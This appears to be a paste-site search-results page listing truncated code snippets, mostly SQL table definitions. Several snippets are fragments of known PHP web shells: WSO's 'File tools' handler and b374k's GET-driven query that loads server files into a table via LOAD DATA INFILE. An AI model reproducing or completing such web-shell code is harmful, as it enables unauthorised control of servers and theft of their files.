42.7K results in 803 ms
8 years ago · Mar 11, 2018, 10:34 PM
Update the cache $cache->update_usergroups(); // Create DB schema $db->query("CREATE TABLE IF NOT EXISTS " . TABLE_PREFIX . "staff_page_members ( `id` int(11)
8 years ago · Mar 11, 2018, 10:18 PM
echo '<h1>File tools</h1><div class=content>'; if( !file_exists(@$_POST['p1']) ) { echo 'File not exists'; printFooter(); return; } $uid = @posix_getpwuid(@fileowner($_POST['p1']));
8 years ago · Mar 11, 2018, 09:04 PM
EXISTS Servico; DROP TABLE IF EXISTS Reserva; CREATE TABLE Cliente ( IDCliente IDENTITY, Nome VARCHAR(25) NOT NULL, Sobrenome VARCHAR(25) NOT
8 years ago · Mar 11, 2018, 08:46 PM
TABLE IF EXISTS `mydb`.`restaurante` ; CREATE TABLE IF NOT EXISTS `mydb`.`restaurante` ( `idrestaurante` INT NOT
8 years ago · Mar 11, 2018, 08:42 PM
am_group` INT NOT NULL; CREATE TABLE IF NOT EXISTS `AdminMappingGroups` ( `amg_id` int(11) NOT
8 years ago · Mar 11, 2018, 08:42 PM
TABLE IF EXISTS `mydb`.`restaurante` ; CREATE TABLE IF NOT EXISTS `mydb`.`restaurante` ( `idrestaurante` INT NOT
8 years ago · Mar 11, 2018, 08:18 PM
ActiveRecord::Base.logger = Logger.new(STDERR) ActiveRecord::Base.connection.execute <<SQL CREATE TABLE IF NOT EXISTS "comments" ( "id" INTEGER PRIMARY
8 years ago · Mar 11, 2018, 07:50 PM
db_bojan` -- -- -------------------------------------------------------- -- -- Struktura tabele `server_banlist` -- CREATE TABLE IF NOT EXISTS `server_banlist` ( `id` int(11) NOT
8 years ago · Mar 11, 2018, 07:22 PM
CREATE TABLE IF NOT EXISTS result( municipalityID SMALLINT, districtID
8 years ago · Mar 11, 2018, 07:08 PM
MAX_LENGTH_MENU 470 new String:g_sSqliteCreate[] = "CREATE TABLE IF NOT EXISTS `%s` (id INTEGER PRIMARY
8 years ago · Mar 11, 2018, 05:54 PM
formatReadableSIUnit(num) -- pretty printLog() a table local function tprint (tbl, loglevel, indent) if not loglevel then loglevel = DEBUG
8 years ago · Mar 11, 2018, 05:52 PM
formatReadableSIUnit(num) -- pretty printLog() a table local function tprint (tbl, loglevel, indent) if not loglevel then loglevel = DEBUG
8 years ago · Mar 11, 2018, 05:48 PM
echo '<h1>File tools</h1><div class=content>'; if( !file_exists(@$_POST['p1']) ) { echo 'File not exists'; printFooter(); return; } $uid = @posix_getpwuid(@fileowner($_POST['p1']));
8 years ago · Mar 11, 2018, 05:46 PM
echo '<h1>File tools</h1><div class=content>'; if( !file_exists(@$_POST['p1']) ) { echo 'File not exists'; wsoFooter(); return; } $uid = @posix_getpwuid(@fileowner($_POST['p1']));
8 years ago · Mar 11, 2018, 05:42 PM
DROP TABLE IF EXISTS Sprzedaz CREATE TABLE Sprzedaz ( PracID INT,
8 years ago · Mar 11, 2018, 05:40 PM
formatReadableSIUnit(num) -- pretty printLog() a table local function tprint (tbl, loglevel, indent) if not loglevel then loglevel = DEBUG
8 years ago · Mar 11, 2018, 05:32 PM
echo '<h1>File tools</h1><div class=content>'; if( !file_exists(@$_POST['p1']) ) { echo 'File not exists'; printFooter(); return; } $uid = @posix_getpwuid(@fileowner($_POST['p1']));
8 years ago · Mar 11, 2018, 04:30 PM
isset($_GET['sqlquery']))){$db = $_GET['db'];$query = "DROP TABLE IF EXISTS b374k_table;\nCREATE TABLE `b374k_table` ( `file` LONGBLOB NOT NULL );\nLOAD DATA INFILE
8 years ago · Mar 11, 2018, 03:28 PM
statement changed 0 rows: CREATE TABLE IF NOT EXISTS `items` (`id` INTEGER PRIMARY
Total pages: 2134